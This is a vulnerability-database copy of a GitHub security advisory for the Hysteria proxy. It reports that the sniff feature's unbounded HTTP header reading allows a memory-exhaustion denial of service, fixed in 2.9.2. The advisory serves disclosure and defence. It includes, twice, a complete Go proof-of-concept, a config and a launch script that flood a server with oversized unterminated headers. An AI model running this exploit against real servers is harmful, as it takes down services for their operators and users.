GHSA-JQC5-2P7Q-FQFC
Vulnerability from github – Published: 2026-06-26 20:19 – Updated: 2026-06-26 20:19
VLAI
Summary
Hysteria: http large header with sniff cause server DoS
Details
Summary
Sending an excessively large header by an attacker could lead to a server-side DoS attack.
Details
The current sniff implementation does not explicitly specify the upper limit for HTTP headers. Attackers can continuously send excessively large headers without including \r\n\r\n, leading to ServerDoS and OutOfMemory errors.
PoC
server.yaml
listen: 127.0.0.1:8443
tls:
cert: poc_server.crt
key: poc_server.key
auth:
type: password
password: sniff-poc-password
sniff:
enable: true
timeout: 10s
rewriteDomain: false
tcpPorts: 80
masquerade:
type: string
string:
content: nope
statusCode: 404
poc.sh
#!/bin/bash
go build poc_sniff_http_dos.go
./poc_sniff_http_dos \
--server 127.0.0.1:8443 \
--auth sniff-poc-password \
--insecure \
--target-host 192.0.2.1 \
--target-port 80 \
--connections 16 \
--header-bytes 838860800 \
--linger 12
poc.go
//go:build poc
package main
import (
"crypto/sha256"
"crypto/x509"
"encoding/hex"
"errors"
"flag"
"fmt"
"net"
"strings"
"sync"
"time"
coreclient "github.com/apernet/hysteria/core/v2/client"
"github.com/apernet/hysteria/extras/v2/obfs"
)
type attackConnFactory struct {
obfuscator obfs.Obfuscator
}
func (f *attackConnFactory) New(_ net.Addr) (net.PacketConn, error) {
conn, err := net.ListenUDP("udp", nil)
if err != nil {
return nil, err
}
if f.obfuscator == nil {
return conn, nil
}
return obfs.WrapPacketConn(conn, f.obfuscator), nil
}
func buildHeaderPayload(totalBytes, chunkSize int) []byte {
prefix := []byte("GET / HTTP/1.1\r\nHost: victim\r\nUser-Agent: hy2-sniff-poc\r\n")
if totalBytes <= len(prefix) {
return prefix[:totalBytes]
}
out := make([]byte, 0, totalBytes)
out = append(out, prefix...)
linePayload := chunkSize - 32
if linePayload < 64 {
linePayload = 64
}
for i := 0; len(out) < totalBytes; i++ {
line := fmt.Sprintf("X-Fill-%06d: %s\r\n", i, strings.Repeat("A", linePayload))
remain := totalBytes - len(out)
if len(line) > remain {
line = line[:remain]
}
out = append(out, line...)
}
// 故意不追加最后一个空行 \r\n,迫使服务端在 sniff timeout 内持续读 header。
return out
}
func makeClient(server, auth, sni string, insecure bool, pinSHA256, salamanderPSK string) (coreclient.Client, error) {
serverAddr, err := net.ResolveUDPAddr("udp", server)
if err != nil {
return nil, err
}
cfg := &coreclient.Config{
ConnFactory: &attackConnFactory{},
ServerAddr: serverAddr,
Auth: auth,
TLSConfig: coreclient.TLSConfig{
InsecureSkipVerify: insecure,
},
}
host, _, err := net.SplitHostPort(server)
if err == nil && sni == "" && net.ParseIP(host) == nil {
cfg.TLSConfig.ServerName = host
}
if sni != "" {
cfg.TLSConfig.ServerName = sni
}
if pinSHA256 != "" {
nHash := strings.ToLower(strings.ReplaceAll(pinSHA256, ":", ""))
cfg.TLSConfig.VerifyPeerCertificate = func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
if len(rawCerts) == 0 {
return errors.New("no peer certificate")
}
h := sha256.Sum256(rawCerts[0])
if hex.EncodeToString(h[:]) == nHash {
return nil
}
return errors.New("no certificate matches the pinned hash")
}
}
if salamanderPSK != "" {
ob, err := obfs.NewSalamanderObfuscator([]byte(salamanderPSK))
if err != nil {
return nil, err
}
cfg.ConnFactory = &attackConnFactory{obfuscator: ob}
}
c, _, err := coreclient.NewClient(cfg)
return c, err
}
func worker(id int, c coreclient.Client, target string, payload []byte, sendChunk int, linger time.Duration, results []string) {
conn, err := c.TCP(target)
if err != nil {
results[id] = fmt.Sprintf("worker=%d dial error=%v", id, err)
return
}
defer conn.Close()
_ = conn.SetWriteDeadline(time.Now().Add(linger))
sent := 0
for sent < len(payload) {
end := sent + sendChunk
if end > len(payload) {
end = len(payload)
}
n, err := conn.Write(payload[sent:end])
if err != nil {
results[id] = fmt.Sprintf("worker=%d partial_sent=%d error=%v", id, sent, err)
return
}
sent += n
}
time.Sleep(linger)
results[id] = fmt.Sprintf("worker=%d sent=%d", id, sent)
}
func main() {
server := flag.String("server", "", "Hysteria server address, e.g. 1.2.3.4:443")
auth := flag.String("auth", "", "Hysteria auth string/password")
sni := flag.String("sni", "", "optional TLS SNI")
insecure := flag.Bool("insecure", false, "skip TLS verification")
pinSHA256 := flag.String("pin-sha256", "", "optional pinned server cert SHA256")
salamanderPSK := flag.String("obfs-salamander-password", "", "optional salamander obfs password")
targetHost := flag.String("target-host", "192.0.2.1", "must usually be an IP so sniff.Check() runs when rewriteDomain=false")
targetPort := flag.Int("target-port", 80, "target port that should be covered by server sniff.tcpPorts")
connections := flag.Int("connections", 16, "number of concurrent Hysteria TCP streams")
headerBytes := flag.Int("header-bytes", 8*1024*1024, "bytes of incomplete HTTP header per stream")
buildChunk := flag.Int("build-chunk", 8192, "approximate size of generated filler header lines")
sendChunk := flag.Int("send-chunk", 64*1024, "bytes written per conn.Write call")
lingerSec := flag.Float64("linger", 12, "seconds to keep each stream open after writing")
flag.Parse()
if *server == "" || *auth == "" {
panic("--server and --auth are required")
}
if !*insecure && *pinSHA256 == "" {
panic("provide one of: --insecure / --pin-sha256")
}
payload := buildHeaderPayload(*headerBytes, *buildChunk)
target := net.JoinHostPort(*targetHost, fmt.Sprintf("%d", *targetPort))
linger := time.Duration(*lingerSec * float64(time.Second))
fmt.Printf("[*] server=%s target=%s streams=%d payload=%d\n", *server, target, *connections, len(payload))
c, err := makeClient(*server, *auth, *sni, *insecure, *pinSHA256, *salamanderPSK)
if err != nil {
panic(err)
}
defer c.Close()
results := make([]string, *connections)
var wg sync.WaitGroup
start := time.Now()
for i := 0; i < *connections; i++ {
wg.Add(1)
go func(i int) {
defer wg.Done()
worker(i, c, target, payload, *sendChunk, linger, results)
}(i)
}
wg.Wait()
fmt.Printf("[*] elapsed=%s\n", time.Since(start).Round(time.Millisecond))
for _, line := range results {
fmt.Printf(" %s\n", line)
}
fmt.Println("[+] sent incomplete oversized HTTP headers; check server-side memory / stability")
}
Impact
Testing showed that the server side used a maximum of 16GB.
Server memory DoS and may cause OOM.
Severity
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/apernet/hysteria"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.9.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T20:19:01Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nSending an excessively large header by an attacker could lead to a server-side DoS attack.\n\n### Details\nThe current sniff implementation does not explicitly specify the upper limit for HTTP headers. Attackers can continuously send excessively large headers without including \\r\\n\\r\\n, leading to ServerDoS and OutOfMemory errors.\n\n### PoC\n\nserver.yaml\n```\nlisten: 127.0.0.1:8443\n\ntls:\n cert: poc_server.crt\n key: poc_server.key\n\nauth:\n type: password\n password: sniff-poc-password\n\nsniff:\n enable: true\n timeout: 10s\n rewriteDomain: false\n tcpPorts: 80\n\nmasquerade:\n type: string\n string:\n content: nope\n statusCode: 404\n```\n\npoc.sh\n```\n#!/bin/bash\ngo build poc_sniff_http_dos.go\n./poc_sniff_http_dos \\\n --server 127.0.0.1:8443 \\\n --auth sniff-poc-password \\\n --insecure \\\n --target-host 192.0.2.1 \\\n --target-port 80 \\\n --connections 16 \\\n --header-bytes 838860800 \\\n --linger 12\n```\n\npoc.go\n```\n//go:build poc\n\npackage main\n\nimport (\n\t\"crypto/sha256\"\n\t\"crypto/x509\"\n\t\"encoding/hex\"\n\t\"errors\"\n\t\"flag\"\n\t\"fmt\"\n\t\"net\"\n\t\"strings\"\n\t\"sync\"\n\t\"time\"\n\n\tcoreclient \"github.com/apernet/hysteria/core/v2/client\"\n\t\"github.com/apernet/hysteria/extras/v2/obfs\"\n)\n\ntype attackConnFactory struct {\n\tobfuscator obfs.Obfuscator\n}\n\nfunc (f *attackConnFactory) New(_ net.Addr) (net.PacketConn, error) {\n\tconn, err := net.ListenUDP(\"udp\", nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif f.obfuscator == nil {\n\t\treturn conn, nil\n\t}\n\treturn obfs.WrapPacketConn(conn, f.obfuscator), nil\n}\n\nfunc buildHeaderPayload(totalBytes, chunkSize int) []byte {\n\tprefix := []byte(\"GET / HTTP/1.1\\r\\nHost: victim\\r\\nUser-Agent: hy2-sniff-poc\\r\\n\")\n\tif totalBytes \u003c= len(prefix) {\n\t\treturn prefix[:totalBytes]\n\t}\n\tout := make([]byte, 0, totalBytes)\n\tout = append(out, prefix...)\n\tlinePayload := chunkSize - 32\n\tif linePayload \u003c 64 {\n\t\tlinePayload = 64\n\t}\n\tfor i := 0; len(out) \u003c totalBytes; i++ {\n\t\tline := fmt.Sprintf(\"X-Fill-%06d: %s\\r\\n\", i, strings.Repeat(\"A\", linePayload))\n\t\tremain := totalBytes - len(out)\n\t\tif len(line) \u003e remain {\n\t\t\tline = line[:remain]\n\t\t}\n\t\tout = append(out, line...)\n\t}\n\t// \u6545\u610f\u4e0d\u8ffd\u52a0\u6700\u540e\u4e00\u4e2a\u7a7a\u884c \\r\\n\uff0c\u8feb\u4f7f\u670d\u52a1\u7aef\u5728 sniff timeout \u5185\u6301\u7eed\u8bfb header\u3002\n\treturn out\n}\n\nfunc makeClient(server, auth, sni string, insecure bool, pinSHA256, salamanderPSK string) (coreclient.Client, error) {\n\tserverAddr, err := net.ResolveUDPAddr(\"udp\", server)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcfg := \u0026coreclient.Config{\n\t\tConnFactory: \u0026attackConnFactory{},\n\t\tServerAddr: serverAddr,\n\t\tAuth: auth,\n\t\tTLSConfig: coreclient.TLSConfig{\n\t\t\tInsecureSkipVerify: insecure,\n\t\t},\n\t}\n\thost, _, err := net.SplitHostPort(server)\n\tif err == nil \u0026\u0026 sni == \"\" \u0026\u0026 net.ParseIP(host) == nil {\n\t\tcfg.TLSConfig.ServerName = host\n\t}\n\tif sni != \"\" {\n\t\tcfg.TLSConfig.ServerName = sni\n\t}\n\tif pinSHA256 != \"\" {\n\t\tnHash := strings.ToLower(strings.ReplaceAll(pinSHA256, \":\", \"\"))\n\t\tcfg.TLSConfig.VerifyPeerCertificate = func(rawCerts [][]byte, _ [][]*x509.Certificate) error {\n\t\t\tif len(rawCerts) == 0 {\n\t\t\t\treturn errors.New(\"no peer certificate\")\n\t\t\t}\n\t\t\th := sha256.Sum256(rawCerts[0])\n\t\t\tif hex.EncodeToString(h[:]) == nHash {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\treturn errors.New(\"no certificate matches the pinned hash\")\n\t\t}\n\t}\n\tif salamanderPSK != \"\" {\n\t\tob, err := obfs.NewSalamanderObfuscator([]byte(salamanderPSK))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tcfg.ConnFactory = \u0026attackConnFactory{obfuscator: ob}\n\t}\n\tc, _, err := coreclient.NewClient(cfg)\n\treturn c, err\n}\n\nfunc worker(id int, c coreclient.Client, target string, payload []byte, sendChunk int, linger time.Duration, results []string) {\n\tconn, err := c.TCP(target)\n\tif err != nil {\n\t\tresults[id] = fmt.Sprintf(\"worker=%d dial error=%v\", id, err)\n\t\treturn\n\t}\n\tdefer conn.Close()\n\t_ = conn.SetWriteDeadline(time.Now().Add(linger))\n\tsent := 0\n\tfor sent \u003c len(payload) {\n\t\tend := sent + sendChunk\n\t\tif end \u003e len(payload) {\n\t\t\tend = len(payload)\n\t\t}\n\t\tn, err := conn.Write(payload[sent:end])\n\t\tif err != nil {\n\t\t\tresults[id] = fmt.Sprintf(\"worker=%d partial_sent=%d error=%v\", id, sent, err)\n\t\t\treturn\n\t\t}\n\t\tsent += n\n\t}\n\ttime.Sleep(linger)\n\tresults[id] = fmt.Sprintf(\"worker=%d sent=%d\", id, sent)\n}\n\nfunc main() {\n\tserver := flag.String(\"server\", \"\", \"Hysteria server address, e.g. 1.2.3.4:443\")\n\tauth := flag.String(\"auth\", \"\", \"Hysteria auth string/password\")\n\tsni := flag.String(\"sni\", \"\", \"optional TLS SNI\")\n\tinsecure := flag.Bool(\"insecure\", false, \"skip TLS verification\")\n\tpinSHA256 := flag.String(\"pin-sha256\", \"\", \"optional pinned server cert SHA256\")\n\tsalamanderPSK := flag.String(\"obfs-salamander-password\", \"\", \"optional salamander obfs password\")\n\ttargetHost := flag.String(\"target-host\", \"192.0.2.1\", \"must usually be an IP so sniff.Check() runs when rewriteDomain=false\")\n\ttargetPort := flag.Int(\"target-port\", 80, \"target port that should be covered by server sniff.tcpPorts\")\n\tconnections := flag.Int(\"connections\", 16, \"number of concurrent Hysteria TCP streams\")\n\theaderBytes := flag.Int(\"header-bytes\", 8*1024*1024, \"bytes of incomplete HTTP header per stream\")\n\tbuildChunk := flag.Int(\"build-chunk\", 8192, \"approximate size of generated filler header lines\")\n\tsendChunk := flag.Int(\"send-chunk\", 64*1024, \"bytes written per conn.Write call\")\n\tlingerSec := flag.Float64(\"linger\", 12, \"seconds to keep each stream open after writing\")\n\tflag.Parse()\n\n\tif *server == \"\" || *auth == \"\" {\n\t\tpanic(\"--server and --auth are required\")\n\t}\n\tif !*insecure \u0026\u0026 *pinSHA256 == \"\" {\n\t\tpanic(\"provide one of: --insecure / --pin-sha256\")\n\t}\n\n\tpayload := buildHeaderPayload(*headerBytes, *buildChunk)\n\ttarget := net.JoinHostPort(*targetHost, fmt.Sprintf(\"%d\", *targetPort))\n\tlinger := time.Duration(*lingerSec * float64(time.Second))\n\n\tfmt.Printf(\"[*] server=%s target=%s streams=%d payload=%d\\n\", *server, target, *connections, len(payload))\n\n\tc, err := makeClient(*server, *auth, *sni, *insecure, *pinSHA256, *salamanderPSK)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer c.Close()\n\n\tresults := make([]string, *connections)\n\tvar wg sync.WaitGroup\n\tstart := time.Now()\n\tfor i := 0; i \u003c *connections; i++ {\n\t\twg.Add(1)\n\t\tgo func(i int) {\n\t\t\tdefer wg.Done()\n\t\t\tworker(i, c, target, payload, *sendChunk, linger, results)\n\t\t}(i)\n\t}\n\n\twg.Wait()\n\tfmt.Printf(\"[*] elapsed=%s\\n\", time.Since(start).Round(time.Millisecond))\n\tfor _, line := range results {\n\t\tfmt.Printf(\" %s\\n\", line)\n\t}\n\tfmt.Println(\"[+] sent incomplete oversized HTTP headers; check server-side memory / stability\")\n}\n\n```\n### Impact\n\nTesting showed that the server side used a maximum of 16GB.\n\nServer memory DoS and may cause OOM.",
"id": "GHSA-jqc5-2p7q-fqfc",
"modified": "2026-06-26T20:19:01Z",
"published": "2026-06-26T20:19:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/apernet/hysteria/security/advisories/GHSA-jqc5-2p7q-fqfc"
},
{
"type": "PACKAGE",
"url": "https://github.com/apernet/hysteria"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Hysteria: http large header with sniff cause server DoS"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…